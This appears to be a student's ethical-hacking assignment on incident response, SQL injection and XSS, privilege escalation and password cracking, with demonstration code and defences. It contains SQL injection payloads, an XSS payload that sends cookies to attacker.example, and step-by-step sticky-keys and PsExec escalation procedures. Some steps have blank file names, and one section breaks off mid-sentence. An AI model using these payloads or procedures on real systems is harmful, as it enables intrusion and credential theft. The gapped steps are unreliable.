ASSIGNMENT-7

1. Case Study Question: XYZ Corporation, a leading financial institution, recently experienced a security breach where sensitive customer data was compromised. As part of the incident response team (IRT), outline the steps you would take to address this incident effectively. Consider incident categorization, detection, communication plan, documentation, and legal/regulatory considerations in your response. Evaluate the importance of incident response planning in mitigating such incidents and maintaining trust with stakeholders.

answer: An incident response plan is a documented, written plan with six distinct phases that helps IT professionals and staff recognize and deal with a cybersecurity incident such as a data breach or cyber attack. Properly creating and managing an incident response plan involves regular updates and training.

Is an incident response plan a PCI DSS requirement? Yes. Requirement 12 of the PCI DSS specifies the steps businesses must take relating to their incident response plan, including:
- 12.10.2: Test the incident response plan at least annually
- 12.10.3: Assign specific personnel to be available 24/7 to respond to incidents
- 12.10.4: Properly and regularly train the staff with incident response responsibilities
- 12.10.5: Include alerts from intrusion-detection, intrusion-prevention, and file-integrity monitoring systems
- 12.10.6: Implement a process to update and manage the incident response plan in line with industry and organizational changes

How to create an incident response plan
An incident response plan should be set up to address a suspected data breach in a series of phases. Within each phase, there are specific areas of need that should be considered. The incident response phases are:
1. Preparation
2. Identification
3. Containment
4. Eradication
5. Recovery
6. Lessons Learned
Let's look at each phase in more depth and point out the items that you need to address.

1. Preparation
This phase will be the workhorse of your incident response planning and, in the end, the most crucial phase for protecting your business. Part of this phase includes:
- Ensure your employees are properly trained regarding their incident response roles and responsibilities in the event of a data breach.
- Develop incident response drill scenarios and regularly conduct mock data breaches to evaluate your incident response plan.
- Ensure that all aspects of your incident response plan (training, execution, hardware and software resources, etc.) are approved and funded in advance.
Your response plan should be well documented, thoroughly explaining everyone's roles and responsibilities. The plan must then be tested to ensure that your employees will perform as they were trained. The more prepared your employees are, the less likely they are to make critical mistakes.
Questions to address:
- Has everyone been trained on security policies?
- Have your security policies and incident response plan been approved by appropriate management?
- Does the Incident Response Team know their roles and the required notifications to make?
- Have all Incident Response Team members participated in mock drills?

2. Identification
This is the process where you determine whether you've been breached. A breach, or incident, could originate from many different areas.
Questions to address:
- When did the event happen?
- How was it discovered?
- Who discovered it?
- Have any other areas been impacted?
- What is the scope of the compromise?
- Does it affect operations?
- Has the source (point of entry) of the event been discovered?

3. Containment
When a breach is first discovered, your initial instinct may be to securely delete everything so you can just get rid of it. However, that will likely hurt you in the long run, since you'll be destroying valuable evidence that you need to determine where the breach started and to devise a plan to prevent it from happening again. Instead, contain the breach so it doesn't spread and cause further damage to your business. If you can, disconnect affected devices from the Internet. Have short-term and long-term containment strategies ready. It's also good to have a redundant system backup to help restore business operations, so that any compromised data isn't lost forever. This is also a good time to update and patch your systems, review your remote access protocols (requiring mandatory multi-factor authentication), change all user and administrative access credentials, and harden all passwords.
Questions to address:
- What's been done to contain the breach short term?
- What's been done to contain the breach long term?
- Has any discovered malware been quarantined from the rest of the environment?
- What sort of backups are in place?
- Does your remote access require true multi-factor authentication?
- Have all access credentials been reviewed for legitimacy, hardened and changed?
- Have you applied all recent security patches and updates?

4. Eradication
Once you've contained the issue, you need to find and eliminate the root cause of the breach. This means all malware should be securely removed, systems should again be hardened and patched, and updates should be applied. Whether you do this yourself or hire a third party to do it, you need to be thorough. If any trace of malware or security issues remains in your systems, you may still be losing valuable data, and your liability could increase.
Questions to address:
- Have artifacts/malware from the attacker been securely removed?
- Has the system been hardened and patched, and have updates been applied?
- Can the system be re-imaged?

5. Recovery
This is the process of restoring and returning affected systems and devices to your business environment. During this time, it's important to get your systems and business operations up and running again without the fear of another breach.
Questions to address:
- When can systems be returned to production?
- Have systems been patched, hardened and tested?
- Can the system be restored from a trusted backup?
- How long will the affected systems be monitored, and what will you look for when monitoring?
- What tools will ensure similar attacks will not recur? (File integrity monitoring, intrusion detection/prevention, etc.)

6. Lessons Learned
Once the investigation is complete, hold an after-action meeting with all Incident Response Team members and discuss what you've learned from the data breach. This is where you will analyze and document everything about the breach. Determine what worked well in your response plan, and where there were holes. Lessons learned from both mock and real events will help strengthen your systems against future attacks.
Questions to address:
- What changes need to be made to security?
- How should employees be trained differently?
- What weakness did the breach exploit?
- How will you ensure a similar breach doesn't happen again?
No one wants to go through a data breach, but it's essential to plan for one. Prepare for it, know what to do when it happens, and learn all that you can afterwards.

2. Investigate the exploitation of vulnerabilities such as SQL injection and cross-site scripting (XSS) in ethical hacking scenarios.

answer: SQL injection attack
SQL injection is a common and prevalent method of attack that targets victims' databases through web applications. It enables attackers to access, modify, or delete data, and thus manipulate the organization's databases.
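The injection mechanics described in this answer, as an added example that is not part of the original assignment or the source article: a Python login function that builds its SQL by string formatting, beside the parameterized version, both run against an in-memory SQLite database. The table, rows and payloads are constructed for the example; passwords are kept in plaintext only to keep the example short (answer 4 below covers how they should actually be stored).

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the web application's
    backend; the rows are sample data, not from any real system."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse battery", "customer"),
         ("admin", "s3cret-admin-pw", "admin")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Steps 2-3 of the attack described above: user input is pasted into the
    query text, so quotes and comment markers in it change the query's structure."""
    query = ("SELECT username, role FROM users "
             "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterized query: the SQL text is fixed and the driver passes the
    values separately, so they can only ever be compared as data."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Payloads for the three outcomes named in the answer (constructed for this example).
BYPASS_AUTH = ("admin' --", "wrong")          # '--' comments out the password check
DUMP_ALL_ROWS = ("alice", "x' OR '1'='1")     # tautology makes the WHERE clause always true
READ_SCHEMA = ("x", "' UNION SELECT name, sql FROM sqlite_master --")  # read metadata

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass:", login_vulnerable(db, *BYPASS_AUTH))
    print("vulnerable, dump:  ", login_vulnerable(db, *DUMP_ALL_ROWS))
    print("vulnerable, schema:", login_vulnerable(db, *READ_SCHEMA))
    print("safe, bypass:      ", login_safe(db, *BYPASS_AUTH))
```

The `--` comment and the `sqlite_master` table are SQLite syntax; other engines use different comment markers and metadata views (for example `information_schema`), but the structural point is identical. Input validation alone does not fix the vulnerable function, because a legitimate username such as O'Brien contains the same quote character the payload relies on; only keeping data out of the query grammar does.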
For any organization, data is one of the most critical and valuable assets, and an attack on its database can wreak havoc on the entire business. Data can include customer records, privileged or personal information, business-critical data, confidential data, or financial records of an organization. According to MITRE ATT&CK, attackers often exploit public-facing applications (technique T1190, Exploit Public-Facing Application) to gain an initial foothold within an organization's network. These applications are generally websites but can also include database services such as SQL servers.

How does a SQL injection attack work?
A SQL injection attack is carried out through the following steps:
1. The attacker researches the targeted database.
2. The attacker identifies vulnerabilities in the webpage or application to exploit. One example of a SQL injection vulnerability is insufficient user input validation, typically a query built by concatenating user input directly into the SQL text.
3. The attacker creates and submits their own input by exploiting this vulnerability, crafting malicious SQL fragments that are injected into the application's standard SQL queries.
4. This enables the attacker to carry out malicious actions on the web application and exploit the database: extracting confidential information, bypassing security controls (such as login checks), modifying records, or deleting entire tables or the database.

Cross-site scripting
A cross-site scripting (XSS) attack is a popular attack technique used by hackers to target web applications. The attacker injects malicious client-side scripts into web pages so that they execute in other users' browsers, allowing the attacker to deliver malware to the target user's system, impersonate the target, and carry out data exfiltration, session hijacking, changes to user settings, and more. According to MITRE ATT&CK, cross-site scripting is one way adversaries carry out a drive-by compromise (technique T1189) to gain initial access. The technique aims to exploit website vulnerabilities through malicious client-side scripts or code.
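The stored-XSS flow and its defence, as an added example that is not part of the original assignment or the source article: a minimal Python stand-in for a server-side page template that inserts a stored comment into HTML text and a user's display name into an attribute, first by plain concatenation and then with context-appropriate HTML encoding. The comments, display name and payloads are constructed for the example.

```python
import html
import re

# Constructed sample data standing in for the vulnerable site's database:
# one benign comment and one carrying the attacker's stored payload.
STORED_COMMENTS = [
    "Great service, thanks!",
    "<script>fetch('https://attacker.example/steal?c=' + document.cookie)</script>",
]
# Constructed display name that breaks out of an HTML attribute instead of a tag.
ATTACKER_NAME = '" autofocus onfocus="alert(document.domain)'


def render_vulnerable(comments, display_name):
    """Builds the page by string concatenation, so untrusted data is parsed as
    HTML: a <script> in a comment runs, and a quote in the name ends the
    value="..." attribute and adds an event handler."""
    parts = ['<input name="display_name" value="' + display_name + '">']
    for comment in comments:
        parts.append('<p class="comment">' + comment + "</p>")
    return "\n".join(parts)


def render_safe(comments, display_name):
    """Same page, with every untrusted value HTML-encoded for the context it is
    inserted into. html.escape(quote=True) encodes < > & " and ', which covers
    text content and double-quoted attribute values."""
    parts = ['<input name="display_name" value="' + html.escape(display_name) + '">']
    for comment in comments:
        parts.append('<p class="comment">' + html.escape(comment) + "</p>")
    return "\n".join(parts)


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
_EVENT_HANDLER_ATTR = re.compile(r'\son\w+\s*=\s*"', re.IGNORECASE)


def contains_live_script(rendered):
    """True if a real <script> start tag survives in the markup."""
    return bool(_SCRIPT_TAG.search(rendered))


def contains_event_handler(rendered):
    """True if an on*="..." attribute appears in the markup (attribute breakout)."""
    return bool(_EVENT_HANDLER_ATTR.search(rendered))


if __name__ == "__main__":
    print(render_vulnerable(STORED_COMMENTS, ATTACKER_NAME))
    print("---")
    print(render_safe(STORED_COMMENTS, ATTACKER_NAME))
```

Two points the encoded output makes visible: the payload is still stored verbatim, and that is fine, because the browser only ever sees `&lt;script&gt;` as text; and encoding is context-specific, so `html.escape` is correct for element text and quoted attributes but not for data placed inside a `<script>` block, a URL, or CSS, which need their own encoders. A Content Security Policy adds a second layer if an encoding is ever missed.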
This provides them with access to systems on the internal network and also allows them to use compromised websites to direct victims to malicious applications meant to steal application access tokens (used to make authorized, legitimate API requests on behalf of users or services to access resources in cloud or SaaS applications).

How does an XSS attack work?
A stored XSS attack is carried out through the following steps:
1. The attacker exploits a vulnerability of a website, such as using its comment or profile form to inject a malicious script into the website's database.
2. The malicious script gets saved in the database of the vulnerable website.
3. A victim user requests a webpage from the website.
4. The website includes the stored malicious script, unencoded, in the page it sends to the victim user in response.
5. The malicious script executes in the victim's browser every time the victim visits the compromised page.
6. The malicious script sends the victim's private data (such as session cookies) to the attacker's server.

Types of XSS attack
XSS is broadly categorized into three types:
- Reflected XSS: The victim user (client) unknowingly sends a malicious script (payload) as part of a regular request to the vulnerable web application or website (server), for example by following a crafted link. The application returns the malicious script in its response, and the browser executes it on loading. Since the malicious script is reflected back from the server to the client, it is called reflected XSS.
- Stored XSS: The attacker stores the payload on the compromised server, and it is delivered whenever a user visits the affected page. Since the malicious script is stored in the web application, it is called stored XSS.
- DOM-based XSS: The attacker exploits client-side code that writes attacker-controlled data into the Document Object Model (DOM), the programming interface browsers expose for web pages. The attacker injects the malicious script into the DOM through a URL, for instance, and when the user performs an action on that page or visits the page through that URL, the application's own script updates the DOM in a way that executes the malicious script. The payload never has to reach the server.

Differences between SQL injection and XSS attack
Even though both SQL injection and XSS are common web hacking techniques, there are a few key differences between the two.

Attack definition
- SQL injection: An attack technique where attackers target data-driven applications and compromise user/organization databases by injecting SQL into the application's queries.
- XSS: An attack technique where attackers execute malicious code that they control in victim users' browsers.

Entry point (MITRE ATT&CK initial access technique)
- SQL injection: Exploit Public-Facing Application (T1190).
- XSS: Drive-by Compromise (T1189).

Attack technique
- SQL injection: The attacker injects malicious SQL fragments into web form input fields (or any other input the query is built from, such as URL parameters, cookies or headers).
- XSS: The attacker injects malicious client-side scripts into webpages/websites.

Impact
- SQL injection: Upon successful execution, the attacker can add, delete, or modify data in the database and bypass security controls.
- XSS: Upon successful execution, the attacker can perform session hijacking, credential theft, data exfiltration, impersonation of the victim user, account hijacking, etc.

Attack language
- SQL injection: SQL.
- XSS: JavaScript.

Although SQL injection and cross-site scripting attacks continue to be popular among attackers, continuous monitoring, testing, and deploying the best preventive measures (parameterized queries for SQL injection; context-aware output encoding and a Content Security Policy for XSS) will help organizations keep their websites from becoming prey to such attacks and neutralize threats preemptively.

3. Discuss privilege escalation as a hacking technique, its implications, and preventive measures.
answer: Privilege escalation is an attack vector that many businesses face due to a loss of focus on permission levels. As a result, security controls are not sufficient to prevent a privilege escalation. Privilege escalation attacks occur when a threat actor gains access to an employee's account, bypasses the proper authorization channel, and successfully grants themselves access to data they are not supposed to have. When deploying these attacks, threat actors are typically attempting to exfiltrate data, disrupt business functions, or create backdoors. All of these actions can have a major impact on business continuity and should be considered when drafting a business continuity plan.

When you encounter a privilege escalation attack, how you respond is critical. Here are a few questions to consider:
- What did the attacker have permission and access to?
- How are business services currently being impacted?
- What other activities were performed on this account during the attack?

What Are The Types Of Privilege Escalation Attacks?
Not every attack will provide threat actors with full access to the targeted system. In these cases, a privilege escalation is required to achieve the desired outcome. There are two types of privilege escalation: horizontal (moving to another account at the same privilege level) and vertical (gaining higher privileges than the compromised account holds).

Horizontal Privilege Escalation
Horizontal privilege escalation occurs when an attacker gains access directly to another user's account with the intent to perform actions as that person, at that person's existing privilege level. This type of attack is easier to pull off since there is no need to elevate permissions. The goal here is to access an account to further spread an attack or to reach data the user has permission to. Day in and day out I analyze numerous phishing emails that attempt to perform this attack. Whether it's a "bank", "Amazon", or any of countless other ecommerce sites, the attack is the same: "Your account will be deactivated due to inactivity. Please click this link and log in to keep your account active." This is, however, one example of many cookie-cutter phishing templates seen in "the wild".

Vertical Privilege Escalation
Vertical privilege escalation is a bit trickier to pull off, as it requires the attacker to gain access to account credentials as well as to elevate the permissions beyond what that account holds. This type of attack tends to require a deep understanding of the vulnerabilities that affect certain operating systems or the use of hacking tools. Phishing campaigns have been used to perform the first part of the attack, gaining access to the account. When it comes to elevating permissions, the attacker has a few options. One option is to exploit vulnerabilities in the operating system to gain SYSTEM or root-level access. Another is to use hacking tools, like Metasploit, to make the job a bit easier.

Examples Of Privilege Escalation Attacks
Now that you have a better understanding of what a privilege escalation attack is, here are five real-world examples:
- Windows Sticky Keys
- Windows Sysinternals
- Process Injection
- Linux Passwd User Enumeration
- Android Metasploit

Windows Sticky Keys
When attempting a privilege escalation attack on Windows, I like to start with a "sticky keys" attack. This attack is fairly easy to perform and does not require any sort of advanced skill set to pull off. To perform this attack you will need physical access to the machine and the ability to boot to a repair disk. Once booted, you will have to replace the system file associated with the sticky keys function (tapping the Shift key five times). From a command prompt, you will make a copy of the file located at %systemroot%\system32. Next, all you have to do is copy the to %systemroot%\system32 with the file name . After the command prompt's executable has been saved to the correct location, reboot. Because the attack depends on modifying the system drive offline, full-disk encryption such as BitLocker (with the key protected by the TPM) blocks it.
Once at the logon screen, tap the Shift key five times to activate sticky keys and you should be presented with a command prompt running with SYSTEM-level privileges. From this level of access, an attacker can create a backdoor into the system by creating a local administrator account.

Windows Sysinternals
Another common method of privilege escalation in Windows is through the use of the Sysinternals tool suite. After an attacker gains a backdoor into the system using the sticky keys method, they can escalate from that local administrator account to SYSTEM. This attack method requires the use of the PsExec command as well as local administrative rights on the machine. After logging in with the backdoor account, which in my case is "fakeadmin", I simply use the psexec.exe tool to escalate my permissions to SYSTEM access. This is done by using the command "psexec.exe -s cmd" (the -s switch runs the process as the SYSTEM account).

Process Injection
Working against weak processes is another method that I use for privilege escalation. One tool that I have seen used in penetration testing is Process Injector. This tool has the capability to enumerate all running processes on a system as well as the account running each process. In order to pull this attack off, you will need access to an account with higher permission levels. After you identify the process you want to inject into, for example cmd.exe, run a command like pinjector.exe -p cmd.exe .

Linux Passwd User Enumeration
A basic privilege escalation attack that is common in Linux is conducted through enumerating the user accounts on the machine. This attack requires the attacker to have access to a shell on the system, commonly obtained through misconfigured FTP servers. Once the attacker has gained access to the shell, the command "cat /etc/passwd | cut -d: -f1" will list all users on the machine: /etc/passwd is world-readable by design, and the first colon-separated field of each line is the username.
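The enumeration command above, reimplemented and extended in Python as an added example that is not from the original article: the same parse of /etc/passwd that gives an attacker the user list also gives a defender the checks that matter after a suspected privilege escalation, namely accounts that can actually log in, extra UID 0 accounts, and accounts with an empty password field. The passwd content below is constructed for the example, not taken from a real host.

```python
# Constructed /etc/passwd content (not from a real host) used as the sample input.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
alice:x:1000:1000:Alice Example,,,:/home/alice:/bin/bash
bob:x:1001:1001:Bob Example,,,:/home/bob:/bin/zsh
backdoor:x:0:0::/tmp:/bin/sh
legacy::1002:1002::/home/legacy:/bin/sh
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts. Fields are colon-separated:
    name:password:UID:GID:GECOS:home:shell. Blank lines and comments are skipped;
    a malformed line raises rather than being silently dropped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d" % (lineno, len(fields)))
        name, password, uid, gid, gecos, home, shell = fields
        entries.append({
            "name": name, "password": password, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell,
        })
    return entries


def usernames(entries):
    """Equivalent of `cut -d: -f1`: every account name on the host."""
    return [e["name"] for e in entries]


def interactive_accounts(entries):
    """Accounts that can actually log in: the ones worth guessing passwords for."""
    return [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def rogue_uid0_accounts(entries):
    """Any UID 0 account other than root is a second root login, a classic
    backdoor left behind after a successful privilege escalation."""
    return [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"]


def empty_password_accounts(entries):
    """An empty password field (instead of 'x' pointing at /etc/shadow) means
    the account requires no password at all."""
    return [e["name"] for e in entries if e["password"] == ""]


def audit(text):
    """Run every check over one passwd file and return the findings."""
    entries = parse_passwd(text)
    return {
        "users": usernames(entries),
        "interactive": interactive_accounts(entries),
        "rogue_uid0": rogue_uid0_accounts(entries),
        "no_password": empty_password_accounts(entries),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(audit(SAMPLE_PASSWD), indent=2))
```

On a real system, run `audit(open("/etc/passwd").read())` and treat any entry in `rogue_uid0` or `no_password` as an incident indicator; the `interactive` list is also the exact target list an attacker with shell access would derive from the same file.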
Android and Metasploit
Metasploit is a well-known tool to most hackers and contains a library of known exploits. In the case of Android devices, Metasploit can be used against rooted Android devices. Once an Android device is rooted, an su binary becomes available which allows commands to be run as root. The example in the original article shows the exploit module being reviewed with "show options" and "show advanced" and then run to execute commands as root.

How To Prevent A Privilege Escalation Attack
Unfortunately, users are the weakest link in the security chain. With just a single click, they could compromise a system or network. To mitigate this risk, businesses implement security awareness programs along with a methodology for validating the effectiveness of the training. In most cases, phishing simulation software, like KnowBe4, GoPhish, or PhishMe, can adequately train users to identify phishing email attempts.

Privilege escalation, like other cyber attacks, takes advantage of system and process vulnerabilities. In order to prevent these attacks, consider implementing proper processes for patch management, new software development/implementation, and user account modification requests, as well as an automated tool to monitor for such changes. Implementing these processes will put the proper safeguards in place to prevent or deter an attacker from attempting privilege escalation. Finally, an intrusion detection system (IDS) and/or intrusion prevention system (IPS) provides an additional layer of security to derail attempts at escalating privileges.

New exploits are being created daily and it is our responsibility to ensure we protect ourselves from attack. A proper patch management process will help ensure all systems and applications are current with the latest patches. During the quest for new and improved software, we must not forget to include security in the process. Oftentimes, security is set aside to meet the business or client needs.
Software code reviews or vendor management processes will help keep security in the loop and strengthen your development practices. During the attack, the attacker may try to elevate their permissions with a phone call or service ticket request to the helpdesk. Without a proper process in place to validate the user's request, this may go unnoticed until an access level review is conducted. To prevent this elevation of permissions, develop a

4. Explain the process of password cracking and discuss its ethical implications.

answer: Password cracking typically refers to the process of recovering passwords from their stored, scrambled (hashed) form. It can be used to help a user get back a forgotten password or to help a system administrator check for weak passwords. But more often, password cracking is used by bad actors to gain unauthorized access to systems and resources.

As an attack vector, password cracking is incredibly varied. Threat actors use specialized tools and multiple techniques, and even blend complementary tactics to boost their chances of success. To get a clearer picture of how they all fit together, it helps to understand that attacks typically fall into two categories:
- Password guessing
- Password cracking
Strictly speaking, password guessing and password cracking are not the same thing, even though the terms are often conflated. Password guessing is an online technique where a bad actor submits candidate passwords to the live login system in a process of trial and error, and is therefore limited by the target's lockout and rate-limiting controls. In contrast, password cracking refers to an offline process where an attacker who has already obtained stored password hashes attempts to recover the plaintext passwords from them, limited only by their own computing power. Because these techniques are typically lumped together, both are covered here.

5 Common password cracking techniques
While there are multiple ways that threat actors crack passwords, here are a few of the most common:

1. Brute-force attack
With this relatively old but effective attack method, bad actors use automated scripts to try possible passwords until the correct one works. Brute-force attacks can be very time consuming because they take a systematic approach to trying all possible permutations of characters in a sequence. The longer the password, the longer it takes. Brute-force attacks are most successful when users have common or weak passwords, which can be "guessed" by tools in a matter of seconds. Cracking a strong password might take a few hours or days, or, for a long random password protected by a slow hash, longer than is practical. Admins who want to defend against these attacks (in their online, guessing form) have several options, including:
- Limiting the number of times a password can be tried
- Blocking an IP address after it has attempted and failed to enter the correct password a certain number of times
- Locking accounts after a certain number of unsuccessful login attempts
- Imposing a time delay between attempts
- Increasing the level of effort, like adding a CAPTCHA or multifactor authentication

2. Dictionary attack
These attacks are similar to brute-force attacks, but they're less about quantity and more about quality. In other words, instead of trying every possible combination, bad actors start with the assumption that users are likely to follow certain patterns when they create a password. So they home in on the most likely words rather than trying everything. Some users pick easy-to-remember passwords, like "password" or "123abc." Others follow predictable patterns that can vary by region: users might pick words related to their favorite sports teams, local landmarks, city names, and so on. So, for example, a New Yorker might choose "yankeefan1998." Attackers collect lists of likely passwords into attack dictionaries. Then, they augment likely passwords with numbers, letters and characters for longer passwords. While these lists aren't as long as those used in brute-force attacks, they can be quite large.
So attackers use automated scripts to try each password against a username until they're locked out (online), or against a stolen hash with no lockout at all (offline).

3. Credential stuffing attack
With credential stuffing, bad actors take advantage of the tendency for users to reuse the same usernames and passwords for multiple accounts. As more credentials are exposed through data breaches, the opportunity for these types of attacks is growing. Here's how it works. Pairs of compromised usernames and passwords are fed to a botnet that automates the process of trying those credentials on multiple sites at the same time. The purpose of these attacks is to identify account combinations that work and can be reused across multiple sites. These attacks have a relatively low success rate per attempt, but the impact of a large-scale botnet attack is often anything but small.

4. Hybrid attack
When users change their password, they'll often add a few extra numbers, letters or characters at the end. Hybrid attacks take advantage of this tendency. Often, hybrid attacks are a mix of dictionary attacks and brute force. In this case, a bad actor may get a user's compromised password for one site. The user learns it has been compromised and changes it. The attacker will now try out variations of the old password using a brute-force method that automates the addition of numbers, letters and more. While this method is more time-consuming than a simple dictionary attack, it's faster than a full brute-force attack.

5. Rainbow table attack
To keep passwords safe, any responsible organization that stores passwords won't keep them in their original plaintext form. Rather, they use a hashing algorithm to convert each password into a fixed-length string of seemingly random letters and numbers. They should also add a unique random value, called a salt, to each password before hashing it, so that identical passwords produce different hashes and every hash has to be attacked individually. But there are only a limited number of hashing algorithms in common use, and without a salt they hash the same password the same way every time.
As a result, attackers can precompute the hashes of huge numbers of likely passwords ahead of time and store them in a lookup structure called a rainbow table, which compresses the hash-to-password mapping into chains so that billions of entries fit on disk. When an attacker obtains a hashed password, they check whether it matches any of the precomputed hashes in their rainbow table; a match reveals the plaintext almost instantly. The downside to rainbow tables is that they take considerable time and effort to create. And they don't work on passwords that have been properly salted, because a separate table would be needed for every possible salt value.

Tips to protect your organization against password attacks
Safe passwords may seem like a trivial piece of your cybersecurity strategy. But passwords are the most common way that cyber criminals gain unauthorized access to confidential data and systems. That makes strong passwords essential to keeping your organization safe. All types of businesses, organizations and institutions can benefit from these password best practices:
- Create strong password policies. Users don't typically have the best password hygiene. Consider a password policy that requires a minimum passphrase length (ideally greater than 20 characters), requires the use of special characters, and forces users to reset their passwords regularly. Note that current guidance (NIST SP 800-63B) recommends against the last two items, mandatory composition rules and scheduled resets, because they push users toward predictable patterns; screening new passwords against lists of breached and commonly used passwords, and forcing a reset only on evidence of compromise, is a better use of the policy.
- Use multifactor authentication. When MFA is used, password cracking is mostly neutralized (though a growing number of attacks employ MFA-bypass techniques). An attacker might figure out a user's password, but in many cases they still won't have access to the secondary authentication method.
- Encrypt, hash and salt passwords. Passwords should be stored as salted hashes produced by a deliberately slow password-hashing function (bcrypt, scrypt, Argon2, or PBKDF2 with a high iteration count); encryption alone is reversible by anyone holding the key, so it is no substitute for hashing. Salting defeats precomputed tables, and the slow hash multiplies the computing power required for every single guess.
- Update systems regularly. When systems aren't updated, malware that records users' keystrokes can be delivered through emails, files and applications. In these so-called keystroke-logging attacks, bad actors gather user credentials and other sensitive information. Updated systems help prevent these attacks.
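Techniques 2, 4 and 5 above and the salting defence, as an added example that is not part of the original page: a small hybrid candidate generator (dictionary words plus mangling rules), a precomputed hash-to-plaintext table standing in for a rainbow table, and a salted slow hash that the table cannot touch. The word list, target passwords and the fixed salt are constructed for the example; the iteration count is deliberately low so the demonstration runs in under a second, where a real deployment would use hundreds of thousands or a memory-hard function such as Argon2.

```python
import hashlib
import hmac

# Constructed word list standing in for an attack dictionary (real ones hold millions).
WORDLIST = ["password", "yankees", "letmein", "dragon", "qwerty"]


def hybrid_candidates(words):
    """Dictionary words plus the mangling rules a hybrid attack applies:
    capitalization, an appended two-digit number, an appended year, a trailing '!'."""
    for word in words:
        for base in (word, word.capitalize()):
            yield base
            for n in range(100):
                yield base + str(n)
            for year in range(1990, 2025):
                yield base + str(year)
            yield base + "!"


def sha256_hex(text):
    """Fast unsalted hash, the weak storage scheme rainbow tables target."""
    return hashlib.sha256(text.encode()).hexdigest()


def build_lookup_table(candidates):
    """Precomputed hash -> plaintext table. A real rainbow table stores hash
    chains to save space, but the security property is the same: the work is
    done once and reused against every unsalted hash ever obtained."""
    return {sha256_hex(c): c for c in candidates}


def crack_with_table(table, hash_hex):
    """Instant lookup; returns the plaintext or None."""
    return table.get(hash_hex)


def salted_hash(password, salt, iterations):
    """PBKDF2-HMAC-SHA256: per-user random salt plus a deliberately slow KDF."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def crack_salted(hash_hex, salt, iterations, candidates):
    """With a salt nothing can be precomputed: every candidate must be hashed
    again for this specific salt, paying the full KDF cost each time.
    Returns (plaintext or None, number of attempts)."""
    attempts = 0
    for candidate in candidates:
        attempts += 1
        if hmac.compare_digest(salted_hash(candidate, salt, iterations), hash_hex):
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    table = build_lookup_table(hybrid_candidates(WORDLIST))
    print("unsalted 'Yankees1998' ->", crack_with_table(table, sha256_hex("Yankees1998")))
    salt = b"constructed-16B!"   # fixed only for reproducibility; use os.urandom(16) for real
    stored = salted_hash("Yankees1998", salt, 1000)
    print("table vs salted hash  ->", crack_with_table(table, stored))
    print("recompute per salt    ->", crack_salted(stored, salt, 1000, hybrid_candidates(WORDLIST)))
```

The table cracks the unsalted hash in one dictionary lookup; against the salted hash it finds nothing, and the attacker is pushed back to recomputing every candidate under that one salt, which is exactly the cost a slow KDF is designed to inflate.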
By implementing these measures, organizations can greatly reduce the chance of sensitive information ending up in the wrong hands.

The future of password security
There's no doubt that passwords have security issues. That's why the popularity of passwordless authentication is on the rise. Passwordless authentication is generally believed to be more secure than standard passwords. It works by enabling users to prove they are who they say they are by matching them with something unique to them, like their voice or a security token. These methods are commonly used as a factor in two-factor authentication (2FA). Here are a few examples:
- Biometrics. With this method, a user's unique characteristics, like their fingerprint, palmprint, voice or face, are enrolled and stored encrypted (as a template, not the raw image). When a user wants to log in, they verify who they are by presenting the same biometric again.
- Time-based one-time password (TOTP). A temporary passcode is generated by an algorithm (RFC 6238) from a secret shared between the user's authenticator and the server, combined with the current time. The codes are typically six digits long and change every 30 or 60 seconds. Google Authenticator and Microsoft Authenticator are two well-known examples. The user usually enrolls by scanning a QR code, which carries the shared secret, with the authenticator app; from then on the app generates the TOTP for the user.
- One-time PIN (OTP). When a user attempts to log in, an OTP, typically a six-digit code, is sent to their cell phone number via short message service (SMS) or to their email address. The user has a limited amount of time to enter that code in the system. In another variation, a unique hyperlink is sent to the user, who then clicks that so-called magic link to log in.
- Push notifications. This method authenticates a user by sending a message to a secure application on their mobile device. When the user gets the notification, they can approve or deny access or view more details.
Passwordless authentication is resistant to most password cracking methods. Plus, it alerts users if something is wrong.
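The TOTP mechanism described above, as an added example that is not from the original page: an implementation of HOTP (RFC 4226) and TOTP (RFC 6238) with Python's standard library only, plus the server-side check that tolerates a little clock skew. The shared secret used here is the published RFC test secret, not a real enrollment secret; the skew window and step size are typical values, not taken from any particular product.

```python
import hmac
import struct
import time


def hotp(secret, counter, digits=6, algorithm="sha1"):
    """RFC 4226 HOTP: HMAC the 8-byte big-endian counter with the shared secret,
    take 31 bits starting at the offset given by the low nibble of the last byte
    (dynamic truncation), and reduce modulo 10**digits."""
    digest = hmac.new(secret, struct.pack(">Q", counter), algorithm).digest()
    offset = digest[-1] & 0x0F
    binary = ((digest[offset] & 0x7F) << 24
              | digest[offset + 1] << 16
              | digest[offset + 2] << 8
              | digest[offset + 3])
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret, for_time=None, step=30, digits=6, algorithm="sha1"):
    """RFC 6238 TOTP: HOTP with the counter set to the number of `step`-second
    intervals since the Unix epoch, so authenticator and server derive the same
    code from the shared secret and the clock alone."""
    if for_time is None:
        for_time = time.time()
    return hotp(secret, int(for_time) // step, digits, algorithm)


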